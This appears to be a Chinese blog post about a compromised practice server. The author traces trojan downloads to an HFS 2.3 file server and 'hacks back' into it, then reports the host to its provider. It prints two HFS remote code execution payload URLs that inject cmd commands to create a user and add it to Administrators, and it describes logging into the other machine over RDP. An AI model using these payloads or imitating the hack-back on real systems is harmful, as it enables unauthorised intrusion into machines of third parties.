自己的服务器被抓鸡,看我如何反击

  • 内容
  • 相关

HFS

先来科普一下:
HFS是什么?
HFS网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者直接将欲加入的档案拖曳至此窗口,便可架设完成个人HTTP网络文件服务器。

事情原因

今天我发现我自己练习用的服务器被别人挂了一句话木马(我没有修改phpstudy的mysql数据库默认密码),一定要注意弱口令和及时更改默认密码如图打开主页成这样的了都是些数据库的日志应该是被黑客给搞了(太可怕了),怪自己太疏忽。

1.jpg2.jpg3.jpg4.jpg

我在里面发现了一些奇怪的下载连接,判断了下,应该是下载木马的连接

5.jpg6.jpg

然后我通过浏览器访问了下该地址,发现是一个HFS的程序

7.jpg8.jpg9.jpg10.jpg11.jpg12.jpg13.jpg14.jpg

然后发现上面全是木马exe,可能是脚本小子用来抓肉鸡用的我记得没错的话。HFS2.3.X有个远程代码执行的漏洞

Payload:

http://127.0.0.1/?search==%00{.exec|cmd /c net user DEF DEFHACKER123 /add.} 
http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators DEF /add.}

反击

HFS2.3.X代码执行的利用工具,我从网上下载了一个15.jpg

成功执行了命令,添加了一个用户16.jpg

然后我直接3389上去看了下

17.jpg18.jpg

后续

这台服务器的归属运营商,我向客服说明了情况,希望他们处理下该问题19.jpg

下面是我与网站客服的聊天截图

20.jpg21.jpg22.jpg23.jpg

最后,希望大家不要利用技术来做非法的事情

网上教“抓鸡” 最高判无期

文章来自Hack - 内部学员:大老鼠投稿

本文标签:

收录状态:百度√[百度已收录]丨360×[360未收录]丨搜狗√[搜狗已收录]

版权声明:若无特殊注明,本文皆为《Mracat》原创,转载请保留文章出处。

本文链接:自己的服务器被抓鸡,看我如何反击 - https://mracat.com/297.html

本文短域名链接:

用手机扫描访问本文章

发表评论

电子邮件地址不会被公开。 必填项已用*标注

请勿乱用他人邮箱,否者您将收不到最新动态消息~

评论

1条评论
  1. avatar

    进你心底 Lv.1 回复

    为啥我的开了宝塔的防火墙然后不知道那个ip触犯了恶意容忍度然后封禁几千秒的时候刚好上去网站,然后打开也有这情况,然后刷新下没了,然后再随便打开一篇文章或者换下一篇又有了,我关了防火墙咋突然就好了,这个ip也不是服务器的ip和手机的ip,不知道咋回事

    广东省东莞市 电信